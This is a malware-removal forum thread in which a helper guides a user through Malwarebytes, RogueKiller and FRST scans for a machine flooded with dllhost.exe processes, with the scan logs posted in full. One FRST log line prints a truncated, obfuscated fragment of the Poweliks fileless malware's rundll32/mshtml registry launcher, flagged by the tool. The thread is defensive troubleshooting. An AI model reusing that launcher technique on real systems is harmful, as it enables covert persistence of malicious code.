Flooded with dllhost.exe *32 (COM Surrogate)

plaggard · November 3, 2014

For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs.

FRST.txt

Addition.txt

MrCharlie · November 4, 2014

Welcome to the forum. (Do what you can)

General P2P/Piracy Warning:

1. If you're using Peer 2 Peer software such uTorrent, BitTorrent or similar you must either fully uninstall it or completely disable it from running while being assisted here.
2. If you have illegal/cracked software (MS Office, Adobe Products), cracks, keygens, custom (Adobe) host file, etc. on the system, please remove or uninstall them now and read the policy on Piracy.
Failure to remove such software will result in your topic being closed and no further assistance being provided.

1. Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........

Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware

Same for PUM (Potentially Unwanted Modifications)

Quarantine all that's found

Post the log (save the log as a .txt file not .xml)

Then......

2. Please download and run RogueKiller 32 bit to your desktop.

RogueKiller<---use this one for 64 bit systems

Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.

For Vista or Windows 7-8, do a right-click on the program, select Run as Administrator to start, & when prompted Allow to run.

Wait for the Prescan to finish

Click Scan to scan the system.

When the scan completes > Don't Fix anything! > Click on the Report Button and post the Report back here.

Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:

%programdata%/RogueKiller/Logs <-------W7

C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <-------XP

(please don't put logs in code or quotes and use the default font)

MrC

Note:

Please read all of my instructions completely including these.

Make sure system restore is turned on and running. Create a new restore point

Make sure you're subscribed to this topic: Click on the Follow This Topic Button (at the top right of this page), make sure that the Receive notification box is checked and that it is set to Instantly

Removing malware can be unpredictable...unlikely but things can go very wrong! Backup any files that cannot be replaced. You can copy them to a CD/DVD, external drive or a pen drive

<+>Please don't run any other scans, download, install or uninstall any programs while I'm working with you.

<+>The removal of malware isn't instantaneous, please be patient.

<+>When we are done, I'll give to instructions on how to cleanup all the tools and logs

<+>Please stick with me until I give you the "all clear".

------->Your topic will be closed if you haven't replied within 3 days!<--------

If I don't respond within 24 hours, please send me a PM

plaggard · November 4, 2014

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/4/2014
Scan Time: 9:12:58 AM
Logfile: mbamreport.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.04.03
Rootkit Database: v2014.11.01.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: bcostello

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 550808
Time Elapsed: 5 min, 30 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 2
PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER|UpdatesDisableNotify, 1, Good: (0), Bad: (1),Replaced,[834078bfe99346f0ba29c470d431f60a]
PUM.Hijack.ConnectionControl, HKU\S-1-5-21-1619941995-4271792153-444280415-1167-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|ConnectionsTab, 1, Good: (0), Bad: (1),Replaced,[80438fa83349c670e404e0546a9b25db]

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

plaggard · November 4, 2014

RogueKiller V10.0.4.0 (x64) [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : bcostello [Administrator]
Mode : Scan -- Date : 11/04/2014 09:28:46

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 16 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: SAMSUNG SSD PM830 2.5" 7 +++++
--- User ---
[MBR] 4ae5c1f7864edd27dcfcf30b3307905a
[bSP] 2ca67ac4e906422a9807f6f81177dd53 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 121308 MB
User = LL1 ... OK
User = LL2 ... OK

plaggard · November 4, 2014

Thanks for your time and help with this MrCharlie. I also want to mention that I'm running these scans on my administrator account, not the account of the affected user. Will this affect the results?

MrCharlie · November 4, 2014

Yes run all the scans on the infected user profile.

Including FRST and RogueKiller.

Please re-scan with FRST and Make sure the Addition Box is checked.

Post or attach the 2 logs FRST(64).txt and Addition.txt

MrC

plaggard · November 4, 2014

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by bcostello (administrator) on ADC69 on 04-11-2014 10:01:11
Running from C:\Users\rbecker\Desktop
Loaded Profiles: rbecker & bcostello & UpdatusUser (Available profiles: rbecker & kmitchell & bcostello & Administrator & UpdatusUser)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(National Instruments Corporation) C:\Windows\SysWOW64\lkads.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\MAX\nimxs.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVCM.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe
(O2Micro International) C:\Windows\System32\o2flash.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(National Instruments, Inc.) C:\Windows\SysWOW64\lkcitdl.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(National Instruments Corporation) C:\Windows\SysWOW64\lktsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Authentec Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Nikon Corporation) C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [682904 2012-09-19] (Alps Electric Co., Ltd.)
HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-02-13] (IDT, Inc.)
HKLM\...\Run: [intelPROSet] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [4805936 2012-08-23] (Intel® Corporation)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2916584 2010-08-12] (ESET)
HKLM\...\Run: [Conisio Login Manager] => C:\Program Files\SolidWorks Enterprise PDM\EdmServer.exe [1614336 2014-01-15] (Dassault Systemes SolidWorks Corp.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [462974 2011-12-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [38984 2013-05-10] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840768 2013-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation)
HKLM-x32\...\Run: [NI Update Service] => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [853640 2012-11-16] (National Instruments)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (Authentec Inc.)
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...\MountPoints2: {c8e9ef48-7ba9-11e2-8a3a-806e6f6e6963} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\contents_TGSG2\setup.htm
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\...\Run: [NIRegistrationWizard] => C:\Program Files (x86)\National Instruments\Shared\RegistrationWizard\Bin\RegistrationWizard.exe [846520 2010-06-21] ()
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [184048 2013-12-04] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NI Error Reporting.lnk
ShortcutTarget: NI Error Reporting.lnk -> C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (National Instruments Corporation)
Startup: C:\Users\kmitchell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [uninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xCB8CB9EA9BF7CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Winsock: Catalog5 10 C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24320] (National Instruments Corporation)
Winsock: Catalog5-x64 10 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [26368] (National Instruments Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.5 192.168.1.6

FireFox:
========
FF ProfilePath: C:\Users\bcostello\AppData\Roaming\Mozilla\Firefox\Profiles\fxbxrcay.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2011win32.dll (National Instruments)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2012win32.dll (National Instruments)
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-20]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-03-15]

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation)
R2 CrmSqlStartupSvc; C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe [23400 2012-01-16] (Microsoft Corporation)
